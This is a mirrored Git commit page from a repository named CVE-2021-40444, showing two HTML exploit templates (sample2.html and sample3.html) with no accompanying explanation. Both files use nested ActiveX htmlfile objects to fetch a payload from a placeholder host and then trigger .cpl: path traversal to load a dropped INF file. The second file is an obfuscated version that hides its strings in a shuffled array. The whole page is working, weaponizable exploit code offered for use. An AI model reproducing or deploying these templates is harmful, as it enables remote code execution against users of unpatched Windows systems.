r3pek/CVE-2021-40444
1
0
Fork 0
mirror of https://github.com/klezVirus/CVE-2021-40444.git synced 2025-05-09 20:13:31 +01:00
Code Releases Activity

First Release

Browse source
This commit is contained in:
d3adc0de 2021-09-15 23:40:51 +01:00
commit f2090f1d70
18 changed files with 778 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

3
template/original.html Normal file
View file

File diff suppressed because one or more lines are too long

69
template/sample2.html Normal file
View file

@ -0,0 +1,69 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function garbage() {
return 'garbage';
}
(function exploit() {
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
try {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
} catch (_0x1ab454) {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
}
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile');
iframe['contentDocument']['open']()['close']();
try {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
} catch (_0x3b004e) {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
}
htmlfile2['open']()['close']();
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
htmlfile3['open']()['close']();
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
htmlfile4['open']()['close']();
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
htmlfile5['open']()['close']();
var ActiveXObjectVAR = new ActiveXObject('htmlfile')
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
, XMLHttpR = new window['XMLHttpRequest']()
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]),
XMLHttpRsend['call'](XMLHttpR),
htmlfile5['Script']['document']['write']('body>');
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0');
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>',
ActiveXObjectVAR2['Script']['location'] = '.cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>',
ActiveXObjectVAR3['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>',
ActiveXObjectVAR5['Script']['location'] = '.cpl:../../../../../Temp/Low/<INF_CHANGE_HERE>',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../../Temp/<INF_CHANGE_HERE>',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../Low/<INF_CHANGE_HERE>',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../<INF_CHANGE_HERE>';
}());
</script>
</body>
</html>

146
template/sample3.html Normal file
View file

@ -0,0 +1,146 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
'use strict';
/** @type {!Array} */
var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>", "htmlfile", "115924pLbIpw", "GET",
"p/<INF_CHANGE_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"];
/**
* @param {number} totalExpectedResults
* @param {?} entrySelector
* @return {?}
*/
function getValue(totalExpectedResults, entrySelector) {
return getValue = function(state, value) {
/** @type {number} */
state = state - 170;
var processorState = tokensArray[state];
return processorState;
}, getValue(totalExpectedResults, entrySelector);
}
(function(data, oldPassword) {
/** @type {function(number, ?): ?} */
var toMonths = getValue;
for (; !![];) {
try {
/** @type {number} */
var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218));
if (userPsd === oldPassword) {
break;
} else {
data["push"](data["shift"]());
}
} catch (_0x34af1e) {
data["push"](data["shift"]());
}
}
})(tokensArray, 384881), function() {
/**
* @return {?}
*/
function token_dash_lineno() {
/** @type {function(number, ?): ?} */
var addedRelations = currentRelations;
return addedRelations(205);
}
/** @type {function(number, ?): ?} */
var currentRelations = getValue;
/** @type {!Window} */
var global = window;
var document = global["document"];
var then = global["Document"]["prototype"]["createElement"];
var writeFunction = global["Document"]["prototype"]["write"];
var PL$22 = global["HTMLElement"]["prototype"]["appendChild"];
var $ = global["HTMLElement"]["prototype"]["removeChild"];
var el = then["call"](document, "iframe");
try {
PL$22["call"](document["body"], el);
} catch (_0x1ab454) {
PL$22["call"](document["documentElement"], el);
}
var ACTIVEX = el["contentWindow"]["ActiveXObject"];
var model = new ACTIVEX("htmlfile");
el["contentDocument"]["open"]()["close"]();
/** @type {string} */
var colname = "p";
try {
$["call"](document["body"], el);
} catch (_0x3b004e) {
$["call"](document["documentElement"], el);
}
model["open"]()["close"]();
var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile");
ops["open"]()["close"]();
/** @type {string} */
var _ = "c";
var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile");
TokenType["open"]()["close"]();
var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile");
view["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var htmlfile = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var Object = global["XMLHttpRequest"];
var args = new Object;
var ast = Object["prototype"]["open"];
var callbacks = Object["prototype"]["send"];
var modelIns = global["setTimeout"];
ast["call"](args, "GET", token_dash_lineno(), ![]);
callbacks["call"](args);
view["Script"]["document"]["write"]("<body>");
var s = then["call"](view["Script"]["document"], "object");
s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0");
/** @type {string} */
var i = "l";
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](view["Script"]["document"]["body"], s);
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":123";
/** @type {string} */
iedom["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
rp_test["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
/** @type {string} */
htmlfile["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
/** @type {string} */
doc["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../Low/<INF_CHANGE_HERE>";
/** @type {string} */
fake["Script"]["location"] = "." + _ + colname + i + ":../../<INF_CHANGE_HERE>";
}();
</script>
</body>
</html>